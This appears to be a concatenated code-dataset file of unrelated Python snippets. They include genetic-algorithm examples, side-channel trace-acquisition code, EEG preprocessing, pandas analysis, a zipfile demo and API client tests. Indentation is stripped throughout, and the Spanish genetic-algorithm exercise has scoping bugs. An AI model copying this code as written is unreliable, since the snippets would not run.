genre_entropy_stats = tools.Statistics(key=lambda ind: ind.fitness.values[1])
tonal_keys_entropy_stats = tools.Statistics(key=lambda ind: ind.fitness.values[2])
sum_diff_bpm_stats = tools.Statistics(key=lambda ind: ind.fitness.values[3])
diff_beats_loudness_stats = tools.Statistics(key=lambda ind: ind.fitness.values[4])
diff_loudness_stats = tools.Statistics(key=lambda ind: ind.fitness.values[5])
diff_dissonance_stats = tools.Statistics(key=lambda ind: ind.fitness.values[6])
avg_interest_stats = tools.Statistics(key=lambda ind: ind.fitness.values[7])
avg_listens_stats = tools.Statistics(key=lambda ind: ind.fitness.values[8])
avg_favorites_stats = tools.Statistics(key=lambda ind: ind.fitness.values[9])
stats = tools.MultiStatistics(time=diff_play_time_stats,
genre=genre_entropy_stats,
tonal=tonal_keys_entropy_stats,
bpm=sum_diff_bpm_stats,
bloud=diff_beats_loudness_stats,
loud=diff_loudness_stats,
diss=diff_dissonance_stats,
interest=avg_interest_stats,
listens=avg_listens_stats,
favs=avg_favorites_stats)
stats.register("avg", numpy.mean, axis=0)
# run the simulation
algorithms.eaMuPlusLambda(pop, toolbox, MU, LAMBDA, CXPB, MUTPB, NGEN,
stats, halloffame=hof, verbose=False)
best = hof[0]
print("Best playlist:")
print("---")
for track in best:
print("%s - %s / %s (%s, %.2f BPM) %s" % (track, tracks_metadata[track]['artist_name'],
tracks_metadata[track]['track_title'],
tracks_metadata[track]['track_duration'],
track_features[track]['bpm'],
tracks_metadata[track]['track_genres']))
print('---')
print("Diff play time:", best.fitness.values[0])
print("Genre entropy:", best.fitness.values[1])
print("Tonal keys entropy:", best.fitness.values[2])
print("Sum diff BPM:", best.fitness.values[3])
print("Diff beats loudness:", best.fitness.values[4])
print("Diff loudness:", best.fitness.values[5])
print("Diff dissonance:", best.fitness.values[6])
print("Avg interest:", best.fitness.values[7])
print("Avg listens:", best.fitness.values[8])
print("Avg favorites:", best.fitness.values[9])
# write playlist (copy songs and create m3u file, one song per line)
import os
from shutil import copyfile
os.mkdir('output')
with open('output/playlist.m3u', 'wt') as m3u:
for track in best:
trackmp3 = track.split('/')[3]
copyfile(track, 'output/%s' % trackmp3)
m3u.write('%s\n' % trackmp3)
| StarcoderdataPython |
189008 | <filename>src/sca3s/backend/acquire/scope/__init__.py<gh_stars>0
# Copyright (C) 2018 SCARV project <<EMAIL>>
#
# Use of this source code is restricted per the MIT license, a copy of which
# can be found at https://opensource.org/licenses/MIT (or should be included
# as LICENSE.txt within the associated archive or repository).
from sca3s import backend as sca3s_be
from sca3s import middleware as sca3s_mw
from sca3s.backend.acquire import board as board
from sca3s.backend.acquire import scope as scope
from sca3s.backend.acquire import hybrid as hybrid
from sca3s.backend.acquire import driver as driver
from sca3s.backend.acquire import repo as repo
from sca3s.backend.acquire import depo as depo
import abc, h5py, numpy, os
CONF_DERIVE_RESOLUTION = 0
CONF_DERIVE_DURATION = 1
CONF_DERIVE_INTERVAL = 2
CONF_SELECT_INIT = 0
CONF_SELECT_FINI = 1
CONF_RESOLUTION_MIN = 0
CONF_RESOLUTION_MAX = 1024
ACQUIRE_MODE_PRIME = 0x01
ACQUIRE_MODE_FETCH = 0x02
class ScopeAbs( abc.ABC ) :
def __init__( self, job ) :
self.job = job
self.scope_id = self.job.conf.get( 'scope_id' )
self.scope_spec = self.job.conf.get( 'scope_spec' )
self.scope_mode = self.job.conf.get( 'scope_mode' )
self.scope_path = self.job.conf.get( 'scope_path' )
self.scope_unit = None
self.channel_trigger_range = None
self.channel_trigger_threshold = None
self.channel_acquire_range = None
self.channel_acquire_threshold = None
self.signal_resolution = None
self.signal_dtype = None
self.signal_interval = None
self.signal_duration = None
self.signal_samples = None
def __str__( self ) :
return self.scope_id
def calibrate( self, dtype = None, resolution = None ) :
trace_spec = self.job.conf.get( 'trace_spec' )
trace_calibrate_trials = int( trace_spec.get( 'calibrate_trials' ) )
trace_calibrate_margin = int( trace_spec.get( 'calibrate_margin' ) )
if ( not os.path.isdir( os.path.join( self.job.path, 'calibrate' ) ) ) :
os.mkdir( os.path.join( self.job.path, 'calibrate' ) )
def step( fd, n ) :
fd.create_dataset( 'trace/trigger', ( n, self.signal_samples ), self.signal_dtype )
fd.create_dataset( 'trace/signal', ( n, self.signal_samples ), self.signal_dtype )
ls = list()
for i in range( n ) :
trace = self.job.driver.acquire()
fd[ 'trace/trigger' ][ i ] = sca3s_be.share.util.resize( trace[ 'trace/trigger' ], self.signal_samples, dtype = self.signal_dtype )
fd[ 'trace/signal' ][ i ] = sca3s_be.share.util.resize( trace[ 'trace/signal' ], self.signal_samples, dtype = self.signal_dtype )
ls.append( sca3s_be.share.util.measure( sca3s_be.share.util.MEASURE_MODE_DURATION, trace[ 'trace/trigger' ], self.job.scope.channel_trigger_threshold ) * self.job.scope.signal_interval )
return ls
# step #0: default
self.job.log.indent_inc( message = 'auto-calibration step #0: default' )
t = self.conf_select( scope.CONF_SELECT_INIT, dtype = dtype, resolution = resolution )
self.job.log.info( 't_conf = %s', str( t ) )
self.job.log.indent_dec()
# step #1: 1 * large trial(s)
self.job.log.indent_inc( message = 'auto-calibration step #1: large trial(s)' )
with h5py.File( os.path.join( self.job.path, 'calibrate', 'calibrate-step_1.hdf5' ), 'a' ) as fd :
ls = step( fd, 1 ) ; l = max( ls ) ; l = ( 2 * l )
self.job.log.info( 'ls = %s -> l = %s', str( ls ), str( l ) )
t = self.conf_select( scope.CONF_SELECT_FINI, dtype = t[ 'dtype' ], resolution = t[ 'resolution' ], interval = t[ 'interval' ], duration = l )
self.job.log.info( 't_conf = %s', str( t ) )
self.job.log.indent_dec()
# step #2: n * small trial(s) + margin
self.job.log.indent_inc( message = 'auto-calibration step #2: small trial(s)' )
with h5py.File( os.path.join( self.job.path, 'calibrate', 'calibrate-step_2.hdf5' ), 'a' ) as fd :
ls = step( fd, trace_calibrate_trials ) ; l = max( ls ) ; l = ( 1 * l ) + ( ( trace_calibrate_margin / 100 ) * l )
self.job.log.info( 'ls = %s -> l = %s', str( ls ), str( l ) )
t = self.conf_select( scope.CONF_SELECT_FINI, dtype = t[ 'dtype' ], resolution = t[ 'resolution' ], interval = t[ 'interval' ], duration = l )
self.job.log.info( 't_conf = %s', str( t ) )
self.job.log.indent_dec()
# step #3: 1 * final trial(s)
self.job.log.indent_inc( message = 'auto-calibration step #3: final trial(s)' )
with h5py.File( os.path.join( self.job.path, 'calibrate', 'calibrate-step_3.hdf5' ), 'a' ) as fd :
ls = step( fd, 1 ) ; l = max( ls ) ; l = ( 1 * l )
self.job.log.indent_dec()
return l
def hdf5_add_attr( self, trace_content, fd ) :
fd.attrs.create( 'scope/signal_dtype', str( self.signal_dtype ), dtype = h5py.string_dtype() )
fd.attrs.create( 'scope/signal_resolution', ( self.signal_resolution ), dtype = '<u8' )
fd.attrs.create( 'scope/signal_interval', ( self.signal_interval ), dtype = '<f8' )
fd.attrs.create( 'scope/signal_duration', ( self.signal_duration ), dtype = '<f8' )
fd.attrs.create( 'scope/signal_samples', ( self.signal_samples ), dtype = '<u8' )
def hdf5_add_data( self, trace_content, fd, n ) :
if ( 'trace/trigger' in trace_content ) :
fd.create_dataset( 'trace/trigger', ( n, self.signal_samples ), dtype = self.signal_dtype )
if ( 'trace/signal' in trace_content ) :
fd.create_dataset( 'trace/signal', ( n, self.signal_samples ), dtype = self.signal_dtype )
if ( 'crop/trigger' in trace_content ) :
fd.create_dataset( 'crop/trigger', ( n, ), dtype = h5py.regionref_dtype )
if ( 'crop/signal' in trace_content ) :
fd.create_dataset( 'crop/signal', ( n, ), dtype = h5py.regionref_dtype )
def hdf5_set_data( self, trace_content, fd, n, i, trace ) :
if ( 'trace/trigger' in trace ) :
trace[ 'trace/trigger' ] = sca3s_be.share.util.resize( trace[ 'trace/trigger' ], self.signal_samples, dtype = self.signal_dtype )
if ( 'trace/signal' in trace ) :
trace[ 'trace/signal' ] = sca3s_be.share.util.resize( trace[ 'trace/signal' ], self.signal_samples, dtype = self.signal_dtype )
if ( 'edge/pos' in trace ) :
trace[ 'edge/pos' ] = min( trace[ 'edge/pos' ], self.signal_samples - 1 )
if ( 'edge/neg' in trace ) :
trace[ 'edge/neg' ] = min( trace[ 'edge/neg' ], self.signal_samples - 1 )
if ( 'trace/trigger' in trace_content ) :
fd[ 'trace/trigger' ][ i ] = trace[ 'trace/trigger' ]
if ( 'trace/signal' in trace_content ) :
fd[ 'trace/signal' ][ i ] = trace[ 'trace/signal' ]
if ( 'crop/trigger' in trace_content ) :
fd[ 'crop/trigger' ][ i ] = fd[ 'trace/trigger' ].regionref[ i, trace[ 'edge/pos' ] : trace[ 'edge/neg' ] ]
if ( 'crop/signal' in trace_content ) :
fd[ 'crop/signal' ][ i ] = fd[ 'trace/signal' ].regionref[ i, trace[ 'edge/pos' ] : trace[ 'edge/neg' ] ]
@abc.abstractmethod
def conf_derive( self, mode, dtype = None, resolution = None, interval = None, duration = None ) :
raise NotImplementedError()
@abc.abstractmethod
def conf_select( self, mode, dtype = None, resolution = None, interval = None, duration = None ) :
raise NotImplementedError()
@abc.abstractmethod
def acquire( self, mode = scope.ACQUIRE_MODE_PRIME | scope.ACQUIRE_MODE_FETCH ) :
raise NotImplementedError()
@abc.abstractmethod
def open( self ) :
raise NotImplementedError()
@abc.abstractmethod
def close( self ) :
raise NotImplementedError()
| StarcoderdataPython |
76617 | import pickle
import pathlib
import numpy as np
from bci3wads.utils import constants
class Epoch:
def __init__(self, signals, flashing, stimulus_codes, stimulus_types,
target_char):
self.n_channels = signals.shape[1]
self.signals = signals
self.flashing = flashing
self.stimulus_codes = stimulus_codes
self.stimulus_types = stimulus_types
self.target_char = target_char
def flash_start_indices(self):
indices = [
i for i in range(len(self.flashing))
if (i == 0) # Each epoch begins with the first flash
or (self.flashing[i] == 1 and self.flashing[i - 1] == 0)
]
return indices
def sample_channel(self, indices, channel_id=constants.CHANNEL_ID,
window_size=constants.WINDOW_SIZE):
channel_signals = self.signals[:, channel_id]
samples = np.array([
channel_signals[i:i+window_size]
for i in indices
])
return samples
def samples_codes(self, indices):
return self.stimulus_codes[indices]
def process_channel(self, channel_id=constants.CHANNEL_ID,
window_size=constants.WINDOW_SIZE):
indices = self.flash_start_indices()
samples = self.sample_channel(indices, window_size=window_size,
channel_id=channel_id)
codes = self.samples_codes(indices)
n_codes = len(np.unique(codes)) # Should be 12
positions = np.array([
np.nonzero(codes == i)[0]
for i in range(n_codes)
])
processed = np.array([samples[position] for position in positions])
return processed
def process_channels(self, channel_ids=constants.CHANNEL_IDS,
window_size=constants.WINDOW_SIZE):
processed_channels = np.concatenate([
self.process_channel(channel_id, window_size)
for channel_id in channel_ids
], axis=-1)
return processed_channels
def target_char_codes(self):
codes = np.nonzero(constants.CHARACTERS == self.target_char)
return [codes[0][0] + 6, codes[1][0]]
def target_char_coords(self):
coords = np.nonzero(constants.CHARACTERS == self.target_char)
return [coords[0][0], coords[1][0]]
class Subject:
def __init__(self, filename, is_train=True):
with open(constants.INTER_DATA_PATH.joinpath(filename), 'rb') as f:
data = pickle.load(f)
self.is_train = is_train
self.name = pathlib.Path(filename).stem
self.signals = data['signals']
self.target_chars = data.get('target_chars')
self.flashings = data['flashings']
self.stimulus_codes = data['stimulus_codes']
self.stimulus_types = data.get('stimulus_types')
# self.epochs = [
# Epoch(signal, flashing, codes, types, target_char)
# for signal, flashing, codes, types, target_char in zip(
# self.signals, self.flashings, self.stimulus_codes,
# self.stimulus_types, self.target_chars
# )
# ]
@property
def epochs(self):
if self.is_train:
return [
Epoch(signal, flashing, codes, types, target_char)
for signal, flashing, codes, types, target_char in zip(
self.signals, self.flashings, self.stimulus_codes,
self.stimulus_types, self.target_chars
)
]
else:
return [
Epoch(signal, flashing, codes, stimulus_types=None,
target_char=None)
for signal, flashing, codes in zip(
self.signals, self.flashings, self.stimulus_codes
)
]
def process_epoch_channels(self, epoch_id=constants.EPOCH_ID,
channel_ids=constants.CHANNEL_IDS,
window_size=constants.WINDOW_SIZE):
processed_channels = self.epochs[epoch_id].process_channels(
channel_ids, window_size)
return processed_channels
def process_epoch(self, processed_channels, target_char, target_char_codes,
target_char_coords,
epoch_id=constants.EPOCH_ID,
channel_ids=constants.CHANNEL_IDS):
data = {}
data['target_char'] = target_char
data['target_char_codes'] = target_char_codes
data['target_char_coords'] = target_char_coords
data['epoch_id'] = epoch_id
data['channel_ids'] = channel_ids
data['processed_channels'] = processed_channels
return data
def save_epoch(self, data):
dir_path = constants.PROC_DATA_PATH / self.name / \
f"channels_{'_'.join([str(ind) for ind in data['channel_ids']])}"
dir_path.mkdir(parents=True, exist_ok=True)
filename = f"epoch_{data['epoch_id']}.pickle"
file_path = dir_path.joinpath(filename)
with open(file_path, 'wb') as f:
pickle.dump(data, f)
| StarcoderdataPython |
1611801 | <reponame>armedturret/print-oops-AUV
from . import ash
from . import grm
from . import kwd
from . import mgn
from . import rdi
from . import srf
from . import sxn
from . import tnl
from . import ubx
from . import vtx
from . import nor
| StarcoderdataPython |
1755267 | <filename>SEE/Scripting/2/2b/2b.py
import pandas as pd
from pandas import Series, DataFrame
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
student_df = pd.read_csv("StudentsPerformance.csv")
print("======Data Headers=======")
student_df.head()
print("=====Data Decription=====")
student_df.info()
student_df.describe()
student_df1 = student_df.drop(['lunch', 'test preparation course'], axis=1)
student_df1.head()
student_df1["parental level of education"] = student_df1["parental level of education"].fillna("high school")
print(student_df1["parental level of education"])
# student_df1["race/ethnicity"] = student_df1['race/ethnicity'].map({
# "group A": "Asian Students",
# "group B": "African Students",
# "group C": "Afro-Asian Students",
# "group D": "American Students",
# "group E": "European Students"
# })
print(student_df1.head(10))
ax = sns.countplot(x="test preparation course", hue="gender", palette="Set1", data=student_df)
ax.set(title="Test Preparation", xlabel="Course", ylabel="Total")
plt.show()
# ax = sns.countplot(x="race/ethnicity", hue="gender", palette="Set1", data=student_df1)
# ax.set(title="Students according to each group", xlabel="Ethnicity", ylabel="Total")
# plt.show()
# marks_intervals = [0, 40, 50, 60, 75]
# categories = ['failed', 'second class', 'first class', 'distinction']
# student_df1['Marks_Categories_math'] = pd.cut(student_df1.mathscore, marks_intervals, labels=categories)
# ax = sns.countplot(x="Marks_Categories_math", hue="gender", palette="Set1", data=student_df1)
# ax.set(title="Math Marks Grouping", xlabel="Marks Groups", ylabel="Total")
# plt.show()
# student_df1['Marks_Categories_reading'] = pd.cut(student_df1.readingscore, marks_intervals, labels=categories)
# ax = sns.countplot(x="Marks_Categories_reading", hue="gender", palette="Set1", data=student_df1)
# ax.set(title="Reading Marks Grouping", xlabel="Marks Groups", ylabel="Total")
# plt.show()
# student_df1['Marks_Categories_writing'] = pd.cut(student_df1.writingscore, marks_intervals, labels=categories)
# ax = sns.countplot(x="Marks_Categories_writing", hue="gender", palette="Set1", data=student_df1)
# ax.set(title="Writing Marks Grouping", xlabel="Marks Groups", ylabel="Total")
# plt.show()
| StarcoderdataPython |
1629855 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import zipfile
from zipfile import ZipFile
zip_file = 'myfile.zip'
with ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED) as zf:
# 默认待添加的文件的mtime不能早于1980年
for root, dirs, files in os.walk('conf.d'):
for file in files:
zf.write(os.path.join(root, file))
# 可将字符串或ZipInfo实例写入文件
zf.writestr('about.txt', 'It is a zip file.')
# 可对内部文件进行读写操作
with zf.open('add.txt', 'w') as myfile:
myfile.write(b'Add a file')
zf.comment = '注释\nThis is a comment.'.encode('utf-8')
print(f'Is {zip_file} a zip file? ', zipfile.is_zipfile(zip_file))
with ZipFile(zip_file) as zf:
print(f'File name: {zf.filename}')
print(zf.read('about.txt').decode('utf-8')) # 通过文件名或ZipInfo对象读取文件
print(f"Comment:\n{zf.comment.decode('utf-8')}")
print('\nInfo list:')
print(f'filename filesize compress_size')
for i in zf.infolist():
print(i.filename, '\t', i.file_size, i.compress_size)
print('\nName list:\n', zf.namelist())
print('\nContent list:')
zf.printdir()
zf.extractall('dst_path')
# zf.extract('file', 'path') # 解压指定文件
# 往压缩包内追加文件
with ZipFile(zip_file, 'a') as zf:
zf.write('new.txt')
# 命令行操作
# -c 创建压缩文件
# $ python -m zipfile -c myfile.zip src_dir src_file
# -e 解压到指定路径
# $ python -m zipfile -e myfile.zip output_dir
# -l 列出压缩包内的文件
# $ python -m zipfile -l myfile.zip
# -t 测试压缩文件
# $ python -m zipfile -t myfile.zip
| StarcoderdataPython |
177945 | from django.contrib.auth import get_user_model
from rest_framework import serializers
from knox.models import AuthToken
User = get_user_model()
username_field = User.USERNAME_FIELD if hasattr(User, 'USERNAME_FIELD') else 'username'
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = (username_field,)
class AuthTokenSerializer(serializers.ModelSerializer):
class Meta:
model = AuthToken
fields = ('created', 'token_key') | StarcoderdataPython |
3360452 | # Asignatura: Inteligencia Artificial (IYA051)
# Grado en Ingeniería Informática
# Escuela Politécnica Superior
# Universidad Europea del Atlántico
# Caso Práctico (CE_Práctica_01)
# En esta práctica se busca el máximo de una función utilizando computación evolutiva
# Se utiliza un algoritmo genético
# Importar librerías a utilizar
import numpy as np
import matplotlib as plt
import random
# FUNCIONES
# lista números aleatorios
def listaAleatorios(n):
lista = [0] * n
for i in range(n):
lista[i] = np.int(100*random.random())/100
return lista
# función de fitness
def fitness(x):
y=np.abs((x-5)/(2+np.sin(x)))
return y
def emparejamiento(k):
# Individuo 1
if lista[k]>prob1:
apto1="NO"
else:
apto1="SI"
k=k+1
# Individuo 2
if lista[k]>prob1:
apto2="SI"
else:
apto2="NO"
k=k+1
# Probabilidad de emparejamiento
if lista[k]>prob_empar:
pempar="NO"
else:
pempar="SI"
k=k+1
print("Aptitud para emparejamiento -> Individuo 1: ",apto1," Individuo 2: ",apto2)
if (pempar=="SI") and (apto1=="SI") and (apto2=="SI"):
print("Hay emparejamiento en esta generación")
# Punto de corte
if lista[k]<0.33:
pcorte=1
elif lista[k]>0.33 and lista[k]<0.66:
pcorte=2
else:
pcorte=3
print("Punto de corte para emparejamiento: ",pcorte)
# Nuevos individuos
aux1=cromosoma1
aux2=cromosoma2
cromosoma1=aux1[0:pcorte]+aux2[pcorte:Lcrom]
cromosoma2=aux2[0:pcorte]+aux1[pcorte:Lcrom]
print("Nuevos Individuos tras emparejamiento")
print("Individuo 1 :",cromosoma1)
print("Individuo 2 :",cromosoma2)
else:
print("No hay emparejamiento en esta generación")
return
def mutacion(k):
# Mutación
# Individuo 1
j=0
for i in range(k,k+Lcrom):
if lista[i]>prob_mut:
print("Se produce mutación en el individuo 1 en la posición ",j)
if cromosoma1[j]==1:
cromosoma1[j]=0
else:
cromosoma1[j]=1
j=j+1
k=k+Lcrom
# Individuo 2
j=0
for i in range(k,k+Lcrom):
if lista[i]>prob_mut:
print("Se produce mutación en el individuo 2 en la posición ",j)
if cromosoma2[j]==1:
cromosoma2[j]=0
else:
cromosoma2[j]=1
j=j+1
k=k+Lcrom
print("Resultado de la mutación")
print("Individuo 1 :",cromosoma1)
print("Individuo 2 :",cromosoma2)
return
def resultadofitness():
# Fitness de individuos
x1=cromosoma1[3]*1+cromosoma1[2]*2+cromosoma1[1]*2*2+cromosoma1[0]*2*2*2
x2=cromosoma2[3]*1+cromosoma2[2]*2+cromosoma2[1]*2*2+cromosoma2[0]*2*2*2
f1=fitness(x1)
f2=fitness(x2)
print("Fitness -> Individuo 1 (x=",x1,"): ",f1," Individuo 2 (x=",x2,"): ",f2)
# Probabilidad de individuos
prob1=f1/(f1+f2)
prob2=f2/(f1+f2)
print("Probabilidad -> Individuo 1 (p=",prob1,")"," Individuo 2 (p=",prob2,")")
return f1,f2,x1,x2
def inicializarcromosomas(k):
# Cromosomas iniciales
print("GENERACIÓN INICIAL")
# Individuo 1
#cromosoma1 = [0] * Lcrom
j=0
for i in range(k,k+Lcrom):
if lista[i]>prob_0_1:
cromosoma1[j]=1
else:
cromosoma1[j]=0
j=j+1
k=k+Lcrom
print("Individuo 1 :",cromosoma1)
# Individuo 2
#cromosoma2 = [0] * Lcrom
j=0
for i in range(k,k+Lcrom):
if lista[i]>prob_0_1:
cromosoma2[j]=1
else:
cromosoma2[j]=0
j=j+1
k=k+Lcrom
print("Individuo 2 :",cromosoma2)
return
# Variables
# Longitud del cromosoma: 4
# Conjunto de elementos del cromosoma: {0,1}
# Número de individuos de la población: 2
# Para la creación de la primera generación:
# Probabilidad del elemento '0': número aleatorio < 0.5
# Probabilidad del elemento '1': número aleatorio > 0.5
# Probabilidad de emparejamiento (crossover): 0.7
# Probabilidad de mutación: 0.3
Lcrom=4
n_ind=2
prob_0_1=0.5
prob_empar=0.7
prob_mut=0.3
pos_aleat=0
prob1=0
prob2=0
max_fit=0
max_gen=0
max_x=0
x1=0
x2=0
f1=0
f2=0
cromosoma1 = [0] * Lcrom
cromosoma2 = [0] * Lcrom
aux1=cromosoma1
aux2=cromosoma2
# Crear la lista aleatoria de números
n_aleat=1000
lista=listaAleatorios(n_aleat)
print("lista aleatoria",lista)
# Inicializar cromosomas
inicializarcromosomas(pos_aleat)
pos_aleat=pos_aleat+2*Lcrom
# Aplicar evolución a nuevas generaciones
n_gen=10
for g in range(0,n_gen):
print("GENERACIÓN ",g)
f1,f2,x1,x2 = resultadofitness()
# Emparejamiento
emparejamiento(pos_aleat)
pos_aleat=pos_aleat+3
# Mutación
mutacion(pos_aleat)
pos_aleat=pos_aleat+2*Lcrom
# Máximo fitness
if (f1>max_fit):
max_fit=f1
max_x=x1
max_gen=g
if (f2>max_fit):
max_fit=f2
max_x=x2
max_gen=g
print("Máximo de la función: ",max_fit," (x= ",max_x," Generación: ",max_gen,")")
| StarcoderdataPython |
1746516 | <filename>tests/test_api.py<gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `mlbench_core.api` package."""
import datetime
import pytest
from mlbench_core.api import ApiClient
@pytest.fixture
def kubernetes_api_client_node_port(mocker):
mock_client = mocker.patch("kubernetes.client.CoreV1Api")
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.type = (
"NodePort"
)
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__len__.return_value = (
1
)
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.ports.__iter__.return_value = [
mocker.MagicMock(node_port=12345, port=80)
]
mock_client.return_value.list_namespaced_pod.return_value.items.__len__.return_value = (
1
)
mock_client.return_value.read_node.return_value.status.addresses.__len__.return_value = (
1
)
mock_client.return_value.read_node.return_value.status.addresses.__iter__.return_value = [
mocker.MagicMock(type="ExternalIP", address="1.1.1.1")
]
return mock_client
@pytest.fixture
def kubernetes_api_client_node_port_internal(mocker):
mock_client = mocker.patch("kubernetes.client.CoreV1Api")
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.type = (
"NodePort"
)
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__len__.return_value = (
1
)
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.ports.__iter__.return_value = [
mocker.MagicMock(node_port=12345, port=80)
]
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.ports.__len__.return_value = (
1
)
mock_client.return_value.list_namespaced_pod.return_value.items.__len__.return_value = (
1
)
mock_client.return_value.read_node.return_value.status.addresses.__len__.return_value = (
1
)
mock_client.return_value.read_node.return_value.status.addresses.__iter__.return_value = [
mocker.MagicMock(type="InternalIP", address="1.1.1.1")
]
return mock_client
@pytest.fixture
def kubernetes_api_client_clusterip(mocker):
mock_client = mocker.patch("kubernetes.client.CoreV1Api")
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.type = (
"ClusterIP"
)
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__len__.return_value = (
1
)
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.cluster_ip = (
"1.1.1.1"
)
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.ports.__getitem__.return_value.port = (
12345
)
return mock_client
@pytest.fixture
def kubernetes_api_client_loadbalancer(mocker):
mock_client = mocker.patch("kubernetes.client.CoreV1Api")
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.type = (
"LoadBalancer"
)
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__len__.return_value = (
1
)
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.spec.ports.__getitem__.return_value.port = (
12345
)
mock_client.return_value.list_service_for_all_namespaces.return_value.items.__getitem__.return_value.status.load_balancer.ingress.ip = (
"1.1.1.1"
)
return mock_client
@pytest.fixture
def kubernetes_api_client_incluster(mocker):
mock_client = mocker.patch("kubernetes.client.CoreV1Api")
mock_client.return_value.list_namespaced_pod.return_value.items.__len__.return_value = (
1
)
mock_client.return_value.list_namespaced_pod.return_value.items.__getitem__.return_value.status.pod_ip = (
"1.1.1.1"
)
return mock_client
def test_instantiation(mocker, kubernetes_api_client_node_port):
mocker.patch("kubernetes.config.load_kube_config")
with ApiClient(in_cluster=False) as client:
assert client is not None
assert client.endpoint == "http://1.1.1.1:12345/api/"
def test_instantiation_nodeport_internal(
mocker, kubernetes_api_client_node_port_internal
):
mocker.patch("kubernetes.config.load_kube_config")
client = ApiClient(in_cluster=False)
assert client is not None
assert client.endpoint == "http://1.1.1.1:12345/api/"
def test_instantiation_url():
client = ApiClient(url="1.1.1.1:12345")
assert client is not None
assert client.endpoint == "http://1.1.1.1:12345/api/"
def test_instantiation_incluster(mocker, kubernetes_api_client_incluster):
mocker.patch("kubernetes.config.load_incluster_config")
client = ApiClient(in_cluster=True)
assert client is not None
assert client.endpoint == "http://1.1.1.1:80/api/"
def test_instantiation_clusterip(mocker, kubernetes_api_client_clusterip):
mocker.patch("kubernetes.config.load_kube_config")
client = ApiClient(in_cluster=False)
assert client is not None
assert client.endpoint == "http://1.1.1.1:12345/api/"
def test_instantiation_loadbalancer(mocker, kubernetes_api_client_loadbalancer):
mocker.patch("kubernetes.config.load_kube_config")
client = ApiClient(in_cluster=False)
assert client is not None
assert client.endpoint == "http://1.1.1.1:12345/api/"
def test_get_all_metrics(mocker, kubernetes_api_client_node_port):
mocker.patch("kubernetes.config.load_kube_config")
rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
client = ApiClient(in_cluster=False)
result = client.get_all_metrics()
assert result is not None
assert result.result().json() == "a"
def test_get_run_metrics(mocker, kubernetes_api_client_node_port):
mocker.patch("kubernetes.config.load_kube_config")
rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
client = ApiClient(in_cluster=False)
result = client.get_run_metrics("1", since=datetime.datetime.now(), summarize=100)
assert result is not None
assert result.result().json() == "a"
def test_get_pod_metrics(mocker, kubernetes_api_client_node_port):
mocker.patch("kubernetes.config.load_kube_config")
rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
client = ApiClient(in_cluster=False)
result = client.get_pod_metrics(
"rel-mlbench-worker-0", since=datetime.datetime.now(), summarize=100
)
assert result is not None
assert result.result().json() == "a"
def test_post_metrics(mocker, kubernetes_api_client_node_port):
mocker.patch("kubernetes.config.load_kube_config")
rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
client = ApiClient(in_cluster=False)
result = client.post_metric("1", "loss", 10.0, cumulative=False)
assert result is not None
assert result.result().json() == "a"
def test_get_runs(mocker, kubernetes_api_client_node_port):
mocker.patch("kubernetes.config.load_kube_config")
rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
client = ApiClient(in_cluster=False)
result = client.get_runs()
assert result is not None
assert result.result().json() == "a"
def test_get_run(mocker, kubernetes_api_client_node_port):
mocker.patch("kubernetes.config.load_kube_config")
rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
client = ApiClient(in_cluster=False)
result = client.get_run("1")
assert result is not None
assert result.result().json() == "a"
def test_create_run_official(mocker, kubernetes_api_client_node_port):
mocker.patch("kubernetes.config.load_kube_config")
rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
client = ApiClient(in_cluster=False)
result = client.create_run(
"test_run",
5,
num_cpus=4.1,
max_bandwidth=10000,
image="PyTorch Cifar-10 ResNet-20",
)
assert result is not None
assert result.result().json() == "a"
def test_create_run_custom(mocker, kubernetes_api_client_node_port):
mocker.patch("kubernetes.config.load_kube_config")
rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
client = ApiClient(in_cluster=False)
result = client.create_run(
"test_run",
5,
num_cpus=4.1,
max_bandwidth=10000,
custom_image_name="localhost:5000/mlbench_worker:latest",
custom_image_command="/.openmpi/bin/mpirun /app/main.py",
run_all_nodes=False,
)
assert result is not None
assert result.result().json() == "a"
def test_get_worker_pods(mocker, kubernetes_api_client_node_port):
mocker.patch("kubernetes.config.load_kube_config")
rg = mocker.patch("concurrent.futures.ThreadPoolExecutor")
rg.return_value.submit.return_value.result.return_value.json.return_value = "a"
client = ApiClient(in_cluster=False)
result = client.get_worker_pods()
assert result is not None
assert result.result().json() == "a"
| StarcoderdataPython |
3329628 | # -*- coding: utf-8 -*-
from scrapy.selector import Selector
from ..items import BaseItem, ImageItem, SkuItem, Color
